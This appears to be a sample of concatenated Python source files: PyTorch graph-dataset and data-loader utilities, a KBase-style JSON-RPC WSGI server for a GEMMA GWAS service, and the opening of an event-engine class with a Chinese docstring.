alpha = torch.cat([ptr[sidx], ptr[tidx]], dim=1) @ self.head[sgn]
alpha = F.leaky_relu(alpha, negative_slope=0.2).exp() * ewt[mask]
normalizer = torch.zeros(ptr.shape[0], device=ptr.device)
normalizer.scatter_add_(0, tidx, alpha)
alpha = alpha / normalizer[tidx] # Only entries with non-zero denominators will be used
message = ptr[sidx] * alpha.unsqueeze(1)
res = torch.zeros_like(ptr)
tidx = tidx.unsqueeze(1).expand_as(message)
res.scatter_add_(0, tidx, message)
res_dict[sgn] = res
return res_dict["pos"] + res_dict["neg"]
#------------------------------- Data handlers ---------------------------------
@logged
class Dataset(torch.utils.data.Dataset):
r"""
Abstract dataset interface extending that of :class:`torch.utils.data.Dataset`
Parameters
----------
getitem_size
Unitary fetch size for each __getitem__ call
"""
def __init__(self, getitem_size: int = 1) -> None:
super().__init__()
self.getitem_size = getitem_size
self.shuffle_seed: Optional[int] = None
self.seed_queue: Optional[multiprocessing.Queue] = None
self.propose_queue: Optional[multiprocessing.Queue] = None
self.propose_cache: Mapping[int, Any] = {}
@property
def has_workers(self) -> bool:
r"""
Whether background shuffling workers have been registered
"""
self_processes = processes[id(self)]
pl = bool(self_processes)
sq = self.seed_queue is not None
pq = self.propose_queue is not None
if not pl == sq == pq:
raise RuntimeError("Background shuffling seems broken!")
return pl and sq and pq
def prepare_shuffle(self, num_workers: int = 1, random_seed: int = 0) -> None:
r"""
Prepare dataset for custom shuffling
Parameters
----------
num_workers
Number of background workers for data shuffling
random_seed
Initial random seed (will increase by 1 with every shuffle call)
"""
if self.has_workers:
self.clean()
self_processes = processes[id(self)]
self.shuffle_seed = random_seed
if num_workers:
self.seed_queue = multiprocessing.Queue()
self.propose_queue = multiprocessing.Queue()
for i in range(num_workers):
p = multiprocessing.Process(target=self.shuffle_worker)
p.start()
self.logger.debug("Started background process: %d", p.pid)
self_processes[p.pid] = p
self.seed_queue.put(self.shuffle_seed + i)
def shuffle(self) -> None:
r"""
Custom shuffling
"""
if self.has_workers:
self_processes = processes[id(self)]
self.seed_queue.put(self.shuffle_seed + len(self_processes)) # Look ahead
while self.shuffle_seed not in self.propose_cache:
shuffle_seed, shuffled = self.propose_queue.get()
self.propose_cache[shuffle_seed] = shuffled
self.accept_shuffle(self.propose_cache.pop(self.shuffle_seed))
else:
self.accept_shuffle(self.propose_shuffle(self.shuffle_seed))
self.shuffle_seed += 1
def shuffle_worker(self) -> None:
r"""
Background shuffle worker
"""
signal.signal(signal.SIGINT, signal.SIG_IGN)
while True:
seed = self.seed_queue.get()
if seed is None:
self.propose_queue.put((None, os.getpid()))
break
self.propose_queue.put((seed, self.propose_shuffle(seed)))
def propose_shuffle(self, seed: int) -> Any:
r"""
Propose shuffling using a given random seed
Parameters
----------
seed
Random seed
Returns
-------
shuffled
Shuffled result
"""
raise NotImplementedError # pragma: no cover
def accept_shuffle(self, shuffled: Any) -> None:
r"""
Accept shuffling result
Parameters
----------
shuffled
Shuffled result
"""
raise NotImplementedError # pragma: no cover
def clean(self) -> None:
r"""
Clean up multi-process resources used in custom shuffling
"""
self_processes = processes[id(self)]
if not self.has_workers:
return
for _ in self_processes:
self.seed_queue.put(None)
self.propose_cache.clear()
while self_processes:
try:
first, second = self.propose_queue.get(
timeout=config.FORCE_TERMINATE_WORKER_PATIENCE
)
except queue.Empty:
break
if first is not None:
continue
pid = second
self_processes[pid].join()
self.logger.debug("Joined background process: %d", pid)
del self_processes[pid]
for pid in list(self_processes.keys()): # If some background processes failed to exit gracefully
self_processes[pid].terminate()
self_processes[pid].join()
self.logger.debug("Terminated background process: %d", pid)
del self_processes[pid]
self.propose_queue = None
self.seed_queue = None
def __del__(self) -> None:
self.clean()
@logged
class ArrayDataset(Dataset):
r"""
Dataset for :class:`numpy.ndarray` and :class:`scipy.sparse.spmatrix`
objects with grouping support. Arrays from the same group should have
the same size in the first dimension, while arrays from different groups
can have varying sizes (arrays of smaller sizes are cycled). Also, data
fetched from this dataset are automatically densified.
Parameters
----------
*arrays
An arbitrary number of data arrays
grouping
Array grouping. Arrays in the same group should have the same number of
samples. During shuffling and splitting, sample correspondence is
preserved within the same group, but not across different groups.
E.g., `grouping=[0, 1, 0, 1, 1]` indicates that array 0, 2 are paired,
and array 1, 3, 4 are paired. If no grouping pattern is specified,
it is assumed that all arrays are in the same group.
getitem_size
Unitary fetch size for each __getitem__ call
Note
----
We keep using arrays because sparse tensors do not support slicing.
Arrays are only converted to tensors after minibatch slicing.
"""
def __init__(
self, *arrays: Array, grouping: Optional[List[Hashable]] = None,
getitem_size: int = 1
) -> None:
super().__init__(getitem_size=getitem_size)
arrays = [
array.tocsr() if scipy.sparse.issparse(array) else np.asarray(array)
for array in arrays
]
self.arrays = arrays
self.grouping = grouping
self.size = max(self.sizes.values())
@property
def grouping(self) -> List[Hashable]:
r"""
Array grouping
"""
return self._grouping
@grouping.setter
def grouping(
self, grouping: Optional[List[Hashable]] = None
) -> None:
grouping = np.asarray(grouping or [0] * len(self.arrays))
if len(grouping) != len(self.arrays):
raise ValueError("Invalid grouping pattern!")
self._groups = collections.OrderedDict([
(g, np.where(grouping == g)[0].tolist())
for g in np.unique(grouping)
])
self._sizes = collections.OrderedDict()
for g, group in self.groups.items():
size_set = set(self.arrays[i].shape[0] for i in group)
if len(size_set) > 1:
raise ValueError(
"Paired arrays do not match in the first dimension!"
)
self.sizes[g] = size_set.pop()
if self.sizes[g] == 0:
raise ValueError("Zero-sized array is not allowed!")
self._grouping = grouping.tolist()
@property
def groups(self) -> Mapping[Hashable, List[int]]:
r"""
Indices of arrays in each group
"""
return self._groups
@property
def sizes(self) -> Mapping[Hashable, int]:
r"""
Array sizes in each group
"""
return self._sizes
def __len__(self) -> int:
return ceil(self.size / self.getitem_size)
def __getitem__(self, index: int) -> List[torch.Tensor]:
index = np.arange(
index * self.getitem_size,
min((index + 1) * self.getitem_size, self.size)
)
return [
torch.as_tensor(array[np.mod(index, array.shape[0])].toarray())
if scipy.sparse.issparse(array)
else torch.as_tensor(array[np.mod(index, array.shape[0])])
for array in self.arrays
]
def propose_shuffle(self, seed: int) -> List[Array]:
rs = get_rs(seed)
shuffled = [None] * len(self.arrays)
for g, group in self.groups.items():
permutation = rs.permutation(self.sizes[g])
for i in group:
shuffled[i] = self.arrays[i][permutation]
return shuffled
def accept_shuffle(self, shuffled: List[Array]) -> None:
self.arrays = shuffled
def random_split(
self, fractions: List[float], random_state: RandomState = None
) -> Tuple[List["ArrayDataset"], List[Mapping[Hashable, np.ndarray]]]:
r"""
Randomly split the dataset into multiple subdatasets according to
given fractions.
Parameters
----------
fractions
Fraction of each split
random_state
Random state
Returns
-------
subdatasets
A list of splitted subdatasets
split_idx_list
A list containing group-index mapping for each fraction
"""
if min(fractions) <= 0:
raise ValueError("Fractions should be greater than 0!")
if sum(fractions) != 1:
raise ValueError("Fractions do not sum to 1!")
rs = get_rs(random_state)
cum_frac = np.cumsum(fractions)
subarrays_list = [[None] * len(self.arrays) for _ in range(len(fractions))]
for g, group in self.groups.items():
permutation = rs.permutation(self.sizes[g])
cum_idx = np.round(cum_frac * self.sizes[g]).astype(int)
split_idx = np.split(permutation, cum_idx[:-1]) # Last idx produces an extra empty split
for i, idx in enumerate(split_idx):
for j in group:
subarrays_list[i][j] = self.arrays[j][idx]
subdatasets = [
ArrayDataset(
*subarrays, grouping=self.grouping, getitem_size=self.getitem_size
) for subarrays in subarrays_list
]
return subdatasets
@logged
class GraphDataset(Dataset):
r"""
Dataset for graphs with support for negative sampling
Parameters
----------
eidx
Vertex indices of edges (:math:`2 \times n_{edges}`)
ewt
Weight of edges (:math:`n_{edges}`), must be in range ``(0.0, 1.0]``.
esgn
Sign of edges (:math:`n_{edges}`)
neg_samples
Number of negative samples per edge
weighted_sampling
Whether to do negative sampling based on vertex importance
deemphasize_loops
Whether to deemphasize self-loops when computing vertex importance
getitem_size
Unitary fetch size for each __getitem__ call
Note
----
Custom shuffling performs negative sampling.
"""
def __init__(
self, eidx: np.ndarray, ewt: np.ndarray, esgn: np.ndarray,
neg_samples: int = 1, weighted_sampling: bool = True,
deemphasize_loops: bool = True, getitem_size: int = 1
) -> None:
super().__init__(getitem_size=getitem_size)
if eidx.ndim != 2 or ewt.ndim != 1 or esgn.ndim != 1 or eidx.shape[0] != 2:
raise ValueError("Invalid data shape!")
if not eidx.shape[1] == ewt.shape[0] == esgn.shape[0]:
raise ValueError("Inconsistent edge number!")
if eidx.min() < 0:
raise ValueError("Invalid edge index!")
if np.any(ewt <= 0):
raise ValueError("Invalid edge weight!")
if set(esgn).difference({-1, 1}):
raise ValueError("Invalid edge sign!")
self.eidx = eidx
self.ewt = ewt
self.esgn = esgn
self.eset = {
(i, j, s) for (i, j), s in
zip(self.eidx.T, self.esgn)
}
self.vnum = self.eidx.max() + 1
if weighted_sampling:
if deemphasize_loops:
non_loop = self.eidx[0] != self.eidx[1]
eidx = self.eidx[:, non_loop]
ewt = self.ewt[non_loop]
else:
eidx = self.eidx
ewt = self.ewt
degree = vertex_degrees(eidx, ewt, vnum=self.vnum, direction="both")
else:
degree = np.ones(self.vnum, dtype=self.ewt.dtype)
self.vprob = degree / degree.sum() # Vertex sampling probability
effective_enum = self.ewt.sum()
self.eprob = self.ewt / effective_enum # Edge sampling probability
self.effective_enum = round(effective_enum)
self.neg_samples = neg_samples
self.size = self.effective_enum * (1 + self.neg_samples)
self.samp_eidx: Optional[np.ndarray] = None
self.samp_ewt: Optional[np.ndarray] = None
self.samp_esgn: Optional[np.ndarray] = None
def __len__(self) -> int:
return ceil(self.size / self.getitem_size)
def __getitem__(self, index: int) -> List[torch.Tensor]:
index = slice(
index * self.getitem_size,
min((index + 1) * self.getitem_size, self.size)
)
return [
torch.as_tensor(self.samp_eidx[:, index]),
torch.as_tensor(self.samp_ewt[index]),
torch.as_tensor(self.samp_esgn[index])
]
def propose_shuffle(
self, seed: int
) -> Tuple[np.ndarray, np.ndarray, np.ndarray]:
(pi, pj), pw, ps = self.eidx, self.ewt, self.esgn
rs = get_rs(seed)
psamp = rs.choice(self.ewt.size, self.effective_enum, replace=True, p=self.eprob)
pi_, pj_, pw_, ps_ = pi[psamp], pj[psamp], pw[psamp], ps[psamp]
pw_ = np.ones_like(pw_)
ni_ = np.tile(pi_, self.neg_samples)
nw_ = np.zeros(pw_.size * self.neg_samples, dtype=pw_.dtype)
ns_ = np.tile(ps_, self.neg_samples)
nj_ = rs.choice(self.vnum, pj_.size * self.neg_samples, replace=True, p=self.vprob)
remain = np.where([
item in self.eset
for item in zip(ni_, nj_, ns_)
])[0]
while remain.size: # NOTE: Potential infinite loop if graph too dense
newnj = rs.choice(self.vnum, remain.size, replace=True, p=self.vprob)
nj_[remain] = newnj
remain = remain[[
item in self.eset
for item in zip(ni_[remain], newnj, ns_[remain])
]]
idx = np.stack([np.concatenate([pi_, ni_]), np.concatenate([pj_, nj_])])
w = np.concatenate([pw_, nw_])
s = np.concatenate([ps_, ns_])
perm = rs.permutation(idx.shape[1])
return idx[:, perm], w[perm], s[perm]
def accept_shuffle(
self, shuffled: Tuple[np.ndarray, np.ndarray, np.ndarray]
) -> None:
self.samp_eidx, self.samp_ewt, self.samp_esgn = shuffled
class DataLoader(torch.utils.data.DataLoader):
r"""
Custom data loader that manually shuffles the internal dataset before each
round of iteration (see :class:`torch.utils.data.DataLoader` for usage)
"""
def __init__(self, dataset: Dataset, **kwargs) -> None:
super().__init__(dataset, **kwargs)
self.collate_fn = self._collate
self.shuffle = kwargs["shuffle"] if "shuffle" in kwargs else False
def __iter__(self) -> "DataLoader":
if self.shuffle:
self.dataset.shuffle() # Customized shuffling
return super().__iter__()
@staticmethod
def _collate(batch):
return tuple(map(lambda x: torch.cat(x, dim=0), zip(*batch)))
class GraphDataLoader(DataLoader):
r"""
Data loader for graph datasets with a special collate function (see
:class:`torch.utils.data.DataLoader` for usage)
"""
def __init__(self, dataset: GraphDataset, **kwargs) -> None:
super().__init__(dataset, **kwargs)
@staticmethod
def _collate(batch):
eidx, ewt, esgn = zip(*batch)
eidx = torch.cat(eidx, dim=1)
ewt = torch.cat(ewt, dim=0)
esgn = torch.cat(esgn, dim=0)
return eidx, ewt, esgn
class ParallelDataLoader:
r"""
Parallel data loader
Parameters
----------
*data_loaders
An arbitrary number of data loaders
cycle_flags
Whether each data loader should be cycled in case they are of
different lengths, by default none of them are cycled.
"""
def __init__(
self, *data_loaders: DataLoader,
cycle_flags: Optional[List[bool]] = None
) -> None:
cycle_flags = cycle_flags or [False] * len(data_loaders)
if len(cycle_flags) != len(data_loaders):
raise ValueError("Invalid cycle flags!")
self.cycle_flags = cycle_flags
self.data_loaders = list(data_loaders)
self.length = len(self.data_loaders)
self.iterators = None
def __iter__(self) -> "ParallelDataLoader":
self.iterators = [iter(loader) for loader in self.data_loaders]
return self
def _next(self, i: int) -> List[torch.Tensor]:
try:
return next(self.iterators[i])
except StopIteration as e:
if self.cycle_flags[i]:
self.iterators[i] = iter(self.data_loaders[i])
return next(self.iterators[i])
raise e
def __next__(self) -> List[torch.Tensor]:
return functools.reduce(
operator.add, [self._next(i) for i in range(self.length)]
)
#----------------------------- Utility functions -------------------------------
def freeze_running_stats(m: torch.nn.Module) -> None:
r"""
Selectively stops normalization layers from updating running stats
Parameters
----------
m
Network module
"""
if isinstance(m, _NormBase):
m.eval()
def get_default_numpy_dtype() -> type:
r"""
Get numpy dtype matching that of the pytorch default dtype
Returns
-------
dtype
Default numpy dtype
"""
return getattr(np, str(torch.get_default_dtype()).replace("torch.", ""))
@logged
@functools.lru_cache(maxsize=1)
def autodevice() -> torch.device:
r"""
Get torch computation device automatically
based on GPU availability and memory usage
Returns
-------
device
Computation device
"""
used_device = -1
if not config.CPU_ONLY:
try:
pynvml.nvmlInit()
free_mems = np.array([
pynvml.nvmlDeviceGetMemoryInfo(
pynvml.nvmlDeviceGetHandleByIndex(i)
).free for i in range(pynvml.nvmlDeviceGetCount())
])
for item in config.MASKED_GPUS:
free_mems[item] = -1
best_devices = np.where(free_mems == free_mems.max())[0]
used_device = np.random.choice(best_devices, 1)[0]
if free_mems[used_device] < 0:
used_device = -1
except pynvml.NVMLError:
pass
if used_device == -1:
autodevice.logger.info("Using CPU as computation device.")
return torch.device("cpu")
autodevice.logger.info("Using GPU %d as computation device.", used_device)
os.environ["CUDA_VISIBLE_DEVICES"] = str(used_device)
return torch.device("cuda")
|
GEMMA_GWASServer.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import datetime
import json
import os
import random as _random
import sys
import traceback
from getopt import getopt, GetoptError
from multiprocessing import Process
from os import environ
from wsgiref.simple_server import make_server
import requests as _requests
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError, \
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from biokbase import log
from GEMMA_GWAS.authclient import KBaseAuth as _KBaseAuth
try:
from ConfigParser import ConfigParser
except ImportError:
from configparser import ConfigParser
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'GEMMA_GWAS'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from GEMMA_GWAS.GEMMA_GWASImpl import GEMMA_GWAS # noqa @IgnorePep8
impl_GEMMA_GWAS = GEMMA_GWAS(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if len(e.args) == 1:
newerr.data = repr(e.args[0])
else:
newerr.data = repr(e.args)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if 'types' in self.method_data[request['method']]:
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'GEMMA_GWAS'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_GEMMA_GWAS.run_gemma_association,
name='GEMMA_GWAS.run_gemma_association',
types=[dict])
self.method_authentication['GEMMA_GWAS.run_gemma_association'] = 'required' # noqa
self.rpc_service.add(impl_GEMMA_GWAS.status,
name='GEMMA_GWAS.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'GEMMA_GWAS ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception as e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print('Request method was %s\n' % environ['REQUEST_METHOD'])
# print('Environment dictionary is:\n%s\n' % pprint.pformat(environ))
# print('Request body was: %s' % request_body)
# print('Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result))
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body.encode('utf8')]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run a using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print("Monkeypatching std libraries for async")
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, will start the server on localhost on a system assigned port
in the main thread. Excecution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
will also allow returning of the port number.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print("Listening on port %s" % port)
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print(str(err)) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print("Host set to %s" % host)
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print("Listening on port %s" % port)
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
eventEngine.py
|
# encoding: UTF-8
# 系统模块
from Queue import Queue, Empty
from threading import Thread
from time import sleep
from collections import defaultdict
# 第三方模块
from qtpy.QtCore import QTimer
# 自己开发的模块
from .eventType import *
########################################################################
class EventEngine(object):
"""
事件驱动引擎
事件驱动引擎中所有的变量都设置为了私有,这是为了防止不小心
从外部修改了这些变量的值或状态,导致bug。
变量说明
__queue:私有变量,事件队列
__active:私有变量,事件引擎开关
__thread:私有变量,事件处理线程
__timer:私有变量,计时器
__handlers:私有变量,事件处理函数字典
方法说明
__run: 私有方法,事件处理线程连续运行用
__process: 私有方法,处理事件,调用注册在引擎中的监听函数
__onTimer:私有方法,计时器固定事件间隔触发后,向事件队列中存入计时器事件
start: 公共方法,启动引擎
stop:公共方法,停止引擎
register:公共方法,向引擎中注册监听函数
unregister:公共方法,向引擎中注销监听函数
put:公共方法,向事件队列中存入新的事件
事件监听函数必须定义为输入参数仅为一个event对象,即:
函数
def func(event)
...
对象方法
def method(self, event)
...
"""
#----------------------------------------------------------------------
def __init__(self):
"""初始化事件引擎"""
# 事件队列
